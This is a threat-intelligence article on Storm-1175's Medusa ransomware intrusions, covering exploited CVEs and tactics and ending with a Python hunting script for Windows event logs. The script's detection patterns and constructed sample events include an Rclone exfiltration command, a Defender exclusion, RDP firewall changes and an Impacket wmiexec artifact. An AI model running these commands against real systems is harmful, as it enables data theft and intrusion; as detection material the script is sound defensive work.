Ethical Hacking News
A China-based threat actor tracked as Storm-1175 has been linked to the deployment of Medusa ransomware, exploiting zero-day and recently patched vulnerabilities in internet-facing assets to run rapid intrusions against healthcare, education, professional services and finance organizations in Australia, the United Kingdom and the United States. Its high operational tempo and its speed at rotating to newly disclosed exploits make it a significant threat to any organization that leaves perimeter systems unpatched.
Key points:
- Microsoft Threat Intelligence has linked a China-based threat actor, Storm-1175, to Medusa ransomware deployments.
- Storm-1175 uses zero-day and N-day vulnerabilities for rapid attacks on healthcare, education, professional services and finance organizations in Australia, the UK and the US.
- The group establishes persistence by creating new user accounts, deploying web shells and installing RMM software, and it tampers with security solutions.
- Storm-1175 has exploited more than 16 vulnerabilities across various platforms since 2023.
- Since late 2024 the group has also targeted Linux systems, including Oracle WebLogic instances; the vulnerability used there has not been identified.
- Its tradecraft relies on living-off-the-land binaries (LOLBins), Impacket, PDQ Deploy and commercial RMM tools to blend in with legitimate administration.
Microsoft Threat Intelligence has identified a China-based threat actor, tracked as Storm-1175, that it links to the deployment of Medusa ransomware. The actor is notable for its high operational tempo and its skill at finding exposed perimeter assets, and it has been responsible for numerous "high-velocity" intrusions that have hit healthcare organizations hardest, along with the education, professional services and finance sectors across Australia, the United Kingdom and the United States.
The actor's modus operandi combines zero-day and N-day exploits to move quickly from initial access to Medusa ransomware deployment. In some cases Storm-1175 has used zero-day exploits before the vulnerability was publicly disclosed; in others it has weaponized recently disclosed vulnerabilities for initial access. Select incidents have also involved chaining multiple exploits for post-compromise activity.
Once it has a foothold, the financially motivated actor moves quickly to exfiltrate data and deploy Medusa ransomware, typically within a few days and in select incidents within 24 hours. To support this, the group establishes persistence by creating new user accounts and deploying web shells or legitimate remote monitoring and management (RMM) software, uses those channels for lateral movement, steals credentials, and interferes with the normal functioning of security solutions.
Since 2023, Storm-1175 has been linked to the exploitation of more than 16 vulnerabilities across various platforms. These include CVE-2023-21529 (Microsoft Exchange Server), CVE-2023-27351 and CVE-2023-27350 (PaperCut), CVE-2024-1708 and CVE-2024-1709 (ConnectWise ScreenConnect), CVE-2025-31161 (CrushFTP), CVE-2025-10035 (Fortra GoAnywhere MFT), CVE-2026-23760 (SmarterTools SmarterMail), and several others. Both CVE-2025-10035 and CVE-2026-23760 are said to have been exploited as zero-days prior to their public disclosure.
As of late 2024, the crew has also shown a taste for Linux systems, exploiting vulnerable Oracle WebLogic instances at several organizations; the exact vulnerability weaponized in those attacks has not been identified. The group's ability to rotate exploits quickly is the central concern: it operates in the window between a vulnerability's disclosure and the availability or adoption of a patch, when many organizations are still exposed, so exposure time on internet-facing assets, not just eventual patching, is what determines risk.
The tactics Storm-1175 employs are notable less for novelty than for disciplined use of tooling that already exists in most environments. Observed methods include living-off-the-land binaries (LOLBins) such as PowerShell and PsExec, along with Impacket for lateral movement. The group also relies on PDQ Deploy, a legitimate software deployment tool, for both lateral movement and payload delivery, including pushing the Medusa ransomware itself across the network.
Other observed tactics include modifying Windows Firewall policies to enable Remote Desktop Protocol (RDP) and deliver malicious payloads to other devices, dumping credentials with Impacket and Mimikatz, configuring Microsoft Defender Antivirus exclusions so that ransomware payloads are not blocked, and using Bandizip for data collection and Rclone for exfiltration.
The group's use of RMM tools such as AnyDesk, Atera, MeshAgent, ConnectWise ScreenConnect and SimpleHelp as dual-use infrastructure is a further concern. Because these tools are legitimately deployed in many enterprises, malicious sessions blend into trusted, encrypted traffic, and an unapproved agent can go unnoticed unless the organization maintains an allowlist of the RMM products it actually uses.
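The behaviours in the preceding paragraphs (new local accounts, Defender exclusions, firewall rules opening RDP, Impacket, PsExec, PDQ Deploy, Bandizip, Rclone, and unapproved RMM agents) are all visible in ordinary Windows Security and Sysmon telemetry. The hunting script below is an added example written for this article; it is not Microsoft's code or any vendor detection. It scans Windows events exported as JSON lines and reports which tactic each hit belongs to, then flags hosts that show several tactics at once. The sample events are constructed, the executable names in the tool table are assumptions a defender would tune for their environment (attackers rename binaries, so treat image-name matches as weak signals), and the wmiexec output-redirection pattern is the well-known Impacket artifact rather than anything described on this page.

```python
"""Hunt Windows Security/Sysmon events (JSON lines) for the Storm-1175
post-compromise tradecraft discussed above. Added example; event lines
are constructed, not real telemetry."""
import json
import re
from collections import defaultdict

# Binaries named in the article, keyed by lowercase image basename.
# Assumption: executable names are the vendor defaults; attackers rename them.
TOOL_SIGNATURES = {
    "rclone.exe": ("exfiltration", "Rclone"),
    "bandizip.exe": ("collection", "Bandizip"),
    "bz.exe": ("collection", "Bandizip CLI"),
    "psexec.exe": ("lateral_movement", "PsExec"),
    "psexec64.exe": ("lateral_movement", "PsExec"),
    "psexesvc.exe": ("lateral_movement", "PsExec service"),
    "mimikatz.exe": ("credential_access", "Mimikatz"),
    "pdqdeployrunner-1.exe": ("lateral_movement", "PDQ Deploy runner"),
    "anydesk.exe": ("rmm", "AnyDesk"),
    "ateraagent.exe": ("rmm", "Atera"),
    "meshagent.exe": ("rmm", "MeshAgent"),
    "screenconnect.clientservice.exe": ("rmm", "ConnectWise ScreenConnect"),
}

# Command-line patterns: firewall changes that expose RDP, Defender
# exclusions added from PowerShell, and Impacket wmiexec's redirection of
# command output to a numbered file on the ADMIN$ share.
CMDLINE_RULES = [
    ("defense_evasion", "firewall rule opening RDP (netsh)",
     re.compile(r"netsh\s+advfirewall\s+firewall\s+(add|set)\s+rule.*(3389|remote\s*desktop)", re.I)),
    ("defense_evasion", "firewall rule opening RDP (PowerShell)",
     re.compile(r"(Enable|Set|New)-NetFirewallRule.*(3389|Remote\s*Desktop)", re.I)),
    ("defense_evasion", "Defender exclusion added via Add-MpPreference",
     re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", re.I)),
    ("lateral_movement", "Impacket wmiexec-style output redirection to ADMIN$",
     re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.I)),
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return [(tactic, technique, evidence)] for one decoded event."""
    eid = event.get("EventID")
    hits = []
    if eid == 4720:  # Security: a user account was created
        hits.append(("persistence", "new local account", event.get("TargetUserName", "?")))
    elif eid == 5007 and "\\Exclusions\\" in event.get("Message", ""):  # Defender config change
        hits.append(("defense_evasion", "Defender exclusion changed", event["Message"]))
    elif eid in (4688, 1):  # Security 4688 or Sysmon 1: process creation
        image = event.get("NewProcessName") or event.get("Image") or ""
        cmd = event.get("CommandLine", "")
        tool = TOOL_SIGNATURES.get(_basename(image))
        if tool:
            hits.append((tool[0], tool[1], image))
        for tactic, name, rx in CMDLINE_RULES:
            if rx.search(cmd):
                hits.append((tactic, name, cmd))
    return hits


def hunt(jsonl):
    """Run classify() over every non-empty JSON line; return flat findings."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        for tactic, technique, evidence in classify(ev):
            findings.append({"host": ev.get("Computer", "?"), "tactic": tactic,
                             "technique": technique, "evidence": evidence})
    return findings


def triage(findings, min_tactics=2):
    """Hosts showing >= min_tactics distinct tactics. One firewall change is
    noise; firewall change + exclusion + Rclone on one box is an intrusion."""
    by_host = defaultdict(set)
    for f in findings:
        by_host[f["host"]].add(f["tactic"])
    return {h: sorted(t) for h, t in by_host.items() if len(t) >= min_tactics}


# Constructed sample export (not real logs). FS01 shows the full chain;
# WS07 shows only a wmiexec artifact; WS09 only an RMM install.
SAMPLE_EVENTS = r"""
{"EventID": 4720, "Computer": "FS01", "TargetUserName": "svc_backup2"}
{"EventID": 5007, "Computer": "FS01", "Message": "Microsoft Defender Antivirus Configuration has changed. New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\ProgramData\\tmp = 0x0"}
{"EventID": 4688, "Computer": "FS01", "NewProcessName": "C:\\Windows\\System32\\netsh.exe", "CommandLine": "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes"}
{"EventID": 4688, "Computer": "FS01", "NewProcessName": "C:\\ProgramData\\rclone.exe", "CommandLine": "rclone.exe copy C:\\Shares\\Finance remote:bucket --transfers 16"}
{"EventID": 1, "Computer": "WS07", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1712345678.12 2>&1"}
{"EventID": 4688, "Computer": "WS07", "NewProcessName": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"}
{"EventID": 4688, "Computer": "WS09", "NewProcessName": "C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe", "CommandLine": "AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent"}
"""

if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['host']:5} {f['tactic']:18} {f['technique']}: {f['evidence'][:60]}")
    print("hosts needing triage:", triage(found))
```

Run against the constructed sample, the script reports four hits on FS01 (account creation, Defender exclusion, RDP firewall rule, Rclone) and one each on WS07 and WS09, and only FS01 crosses the two-tactic threshold. The point of the tiering is that every individual signal here is something an administrator might legitimately do; it is the combination on one host inside a short window that matches the article's description of a Storm-1175 intrusion. Feed it a real export and the first thing to tune is the RMM list, which should contain every remote-access product not on the organization's approved list.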
The practical lesson from Storm-1175 is that the attacker's speed is the whole game: an actor that exploits a vulnerability within days of disclosure, sometimes before it, beats a monthly patch cycle every time. Organizations exposed to the products listed above should shorten the time internet-facing assets stay unpatched, audit Defender exclusions and firewall changes, and treat any RMM agent outside their approved set as an incident rather than an oddity.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Looming-Threat-of-Storm-1175-A-China-Linked-Cyber-Actor-Leveraging-Zero-Days-to-Deploy-Medusa-Ransomware-ehn.shtml
https://thehackernews.com/2026/04/china-linked-storm-1175-exploits-zero.html
https://www.microsoft.com/en-us/security/blog/2026/04/06/storm-1175-focuses-gaze-on-vulnerable-web-facing-assets-in-high-tempo-medusa-ransomware-operations/
https://nvd.nist.gov/vuln/detail/CVE-2023-21529
https://www.cvedetails.com/cve/CVE-2023-21529/
https://nvd.nist.gov/vuln/detail/CVE-2023-27351
https://www.cvedetails.com/cve/CVE-2023-27351/
https://nvd.nist.gov/vuln/detail/CVE-2023-27350
https://www.cvedetails.com/cve/CVE-2023-27350/
https://nvd.nist.gov/vuln/detail/CVE-2024-1708
https://www.cvedetails.com/cve/CVE-2024-1708/
https://nvd.nist.gov/vuln/detail/CVE-2024-1709
https://www.cvedetails.com/cve/CVE-2024-1709/
https://nvd.nist.gov/vuln/detail/CVE-2025-31161
https://www.cvedetails.com/cve/CVE-2025-31161/
https://nvd.nist.gov/vuln/detail/CVE-2026-23760
https://www.cvedetails.com/cve/CVE-2026-23760/
https://nvd.nist.gov/vuln/detail/CVE-2025-10035
https://www.cvedetails.com/cve/CVE-2025-10035/
https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/
https://cloud.google.com/security/resources/insights/apt-groups
Published: Tue Apr 7 03:16:14 2026 by llama3.2 3B Q4_K_M